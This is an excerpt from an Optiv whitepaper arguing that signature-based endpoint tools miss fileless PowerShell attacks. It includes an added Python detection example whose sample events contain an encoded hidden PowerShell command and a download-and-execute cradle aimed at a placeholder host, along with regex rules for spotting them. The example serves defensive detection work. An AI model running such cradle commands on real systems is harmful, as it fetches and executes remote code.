*Excerpt from Solution Spotlight: Next-Generation Endpoint Security. Authored by Rafal Los, Director of Solutions Research, Optiv.
The topic of corporate endpoint security is commonplace in the board rooms of enterprises large and small as the seemingly never-ending arms race with adversaries – whether activist, hacktivist, corporate or nation-state sponsored – yields breach after breach. Business leaders look to security executives to define security strategies that are operationally mature while continuing to allow the business to be agile and cost-effective, and to empower their workforce for maximum utility in increasingly hostile environments. As more security executives and professionals push their endpoint strategies into tighter alignment with business objectives, the delicate balance between productivity, cost and security benefit remains a challenge.
Even more frustrating for business executives is that as security spending increases, it never seems to be enough. Executives are continually frustrated that, no matter how much money and how many people they invest in security, they can always be doing more. Adversaries are always a step ahead and a second faster – meaning breaches continue to make headlines in spite of the rise in security budgets. Endpoint security programs, which are key components of a holistic enterprise security strategy, are struggling to adapt to the rapid escalation in adversary activity and to protect the corporate endpoint in a more meaningful and effective way.
Adversaries are Winning
Furthermore, from anecdotal evidence, business leaders are increasingly pushing back against the additive security model – hesitating to add more obstacles to end-user productivity while loading down endpoints with yet another agent. As specialized tools are deployed by security for prevention, detection, response and recovery tasks, it is inevitable that endpoints slow down and system overhead increases. Even with the addition of new tools, endpoint systems continue to be compromised because there is a general lack of holistic integration between network, endpoint and various other security tools. Deployed technologies are inadequate and fail to address continually changing threats as adversaries evolve tactics and adapt quickly to static, pattern-based defenses. An evolution in endpoint security, coupling actionable threat intelligence with proactive attack detection, is required.
An Evolution on the Endpoints
In the course of engaging with clients on security strategy engagements, the Office of the CISO has discovered that a vast majority of Fortune 1000 clients do not have adequate endpoint protection against even moderately advanced adversaries. Nearly all strategy roadmaps of these clients include a refresh of endpoint security tools with a heavy focus on advanced threats and mitigations. Overall, enterprises are looking to an evolution on the endpoints to provide better tools to decrease the impact of an infiltration or breach, decrease the dwell time of their attackers and improve response and remediation capabilities.
The rise in high-profile breaches comes as no surprise to enterprise security professionals. As adversaries evolve and adapt, defenses have largely remained static even though more tools are added on a regular basis, especially to the endpoint. Security still depends on signatures and patterns, and continues to focus on malware, which is responsible for a mere 40 percent of all breaches according to the 2013 Verizon Data Breach Investigations Report (DBIR).
The evolving adversary continues to be a problem for signature-based detection tools. Over the last decade these tools have attempted to keep pace with adversaries by writing more signatures faster and broadening detection capabilities. This approach has created multiple problems. First, an adversary can adapt and evolve their attack patterns faster than tool providers can update signatures. Second, alerts from even a well-tuned detection platform can quickly overwhelm a security team’s ability to respond effectively. Finally, many security tools still focus on network-based defenses while corporate assets become ever more mobile.
Static indicators as a detection method for malicious activity continue to deliver diminishing results as sophisticated adversaries move beyond malware. To repeat, according to the 2013 Verizon DBIR, only 40 percent of successful breaches were the result of malware. Adversaries are moving from dropping packaged malware as the primary method of attack to directly attacking browsers and operating systems using tools built into the operating system. Such attacks, whether PowerShell-driven or purely in-memory, execute fully without ever writing to disk, so traditional file-scanning detection tools fail silently.
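To make the gap concrete, here is an added example (written for this excerpt, not Optiv's or any vendor's tooling) that runs a hash blocklist and a set of behavioural rules over constructed process-creation events. The hashes, blocklist entry, command lines and host paths are all placeholders; the point is that a fileless PowerShell invocation matches no file hash at all, while rules keyed on how the interpreter is used still surface it, and a routine scripted admin task is not flagged.

```python
import re

# Constructed sample process-creation events, as an EDR- or Sysmon-style
# sensor might record them (not real telemetry; hashes are placeholders).
SAMPLE_EVENTS = [
    {"id": 1, "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe quarterly_report.txt", "sha256": "HASH-NOTEPAD"},
    {"id": 2, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -NoProfile -w hidden -enc BASE64PLACEHOLDER",
     "sha256": "HASH-POWERSHELL"},
    {"id": 3, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -c \"IEX (New-Object Net.WebClient)"
                ".DownloadString('http://PLACEHOLDER-HOST/stage')\"",
     "sha256": "HASH-POWERSHELL"},
    {"id": 4, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\inventory.ps1",
     "sha256": "HASH-POWERSHELL"},
]

# Signature-style control: a blocklist of file hashes. The only entry is a
# placeholder for a previously seen dropped binary, which these events never touch.
KNOWN_BAD_HASHES = {"HASH-DROPPED-MALWARE"}

# Behavioural rules keyed on how PowerShell is invoked, not on what is on disk.
BEHAVIOUR_RULES = {
    "encoded_command": re.compile(r"-(?:e|ec|enc|encodedcommand)\b", re.I),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden\b", re.I),
    "download_cradle": re.compile(r"downloadstring|downloadfile|invoke-webrequest", re.I),
    "in_memory_exec": re.compile(r"\biex\b|invoke-expression", re.I),
}


def signature_verdict(event):
    """True only if the executed image's hash is on the blocklist."""
    return event["sha256"] in KNOWN_BAD_HASHES


def behaviour_hits(event):
    """Names of behavioural rules the command line matches (PowerShell only)."""
    if not event["image"].lower().endswith("powershell.exe"):
        return []
    return [name for name, rx in BEHAVIOUR_RULES.items() if rx.search(event["cmdline"])]


def triage(events, min_hits=1):
    """Map event id -> matched rules for events that merit analyst attention."""
    flagged = {}
    for ev in events:
        hits = behaviour_hits(ev)
        if len(hits) >= min_hits:
            flagged[ev["id"]] = hits
    return flagged
```

Event 4 shows the caveat a detection engineer needs: fileless is not the same as malicious, so rules should score usage patterns rather than simply alerting on every PowerShell launch.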
Network detection tools offer scale, but lack the ability to protect corporate assets as they become increasingly mobile. Relying solely on network-based defenses quickly proves problematic because much modern malware simply waits for the endpoint to leave the safety of the corporate perimeter before performing its tasks. The inability to quickly and effectively share critical security information puts the enterprise security team at a severe disadvantage, and such a narrow view makes defending against previously unknown threats extremely inefficient. To compound the situation, hiring and retaining top-level threat analysts continues to pose a challenge for even some of the largest enterprises. The result is a narrow perspective, inefficient use of available tools, and a continued struggle to defend against adversaries that adapt to and overcome enterprise defenses.
As part of a holistic, defense-in-depth strategy, the endpoint is a logical defensive control point for organizations that have maturing network controls and still struggle with intrusions.
Read the full Solution Spotlight on Next-Generation Endpoint Security for strategy, prerequisites, and operational guidance on today’s endpoint protection solutions.